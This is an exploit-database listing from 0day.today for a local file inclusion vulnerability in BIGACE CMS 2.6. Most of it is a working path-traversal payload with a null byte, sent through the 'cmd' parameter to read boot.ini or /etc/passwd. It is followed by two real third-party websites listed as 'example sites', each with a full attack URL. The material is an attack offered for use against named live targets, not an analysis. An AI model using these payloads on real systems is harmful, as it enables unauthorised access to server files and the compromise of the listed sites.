[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

BIGACE CMS 2.6 (cmd) Local File Inclusion Vulnerability

Author
CWD@rBe
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5438
Category
web applications
Date add
29-06-2009
Platform
unsorted
=======================================================
BIGACE CMS 2.6 (cmd) Local File Inclusion Vulnerability
=======================================================


-----------------:LFI:----------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------
script       : BIGACE 2.6
  
download  : http://garr.dl.sourceforge.net/sourceforge/bigace/bigace_2.6.zip
 
***************************************************************************************************************
exploit:
 
http://127.0.0.1/public/index.php?cmd=../../../../../../../../boot.ini%00&id=-1_tsearch_len
 
example sites
 
1.http://my.slow.ccu.edu.tw/bigace/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len
 
2.http://www.tvoffenbach.net/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len
 
****************************************************************************************************************




#  0day.today [2024-11-14]  #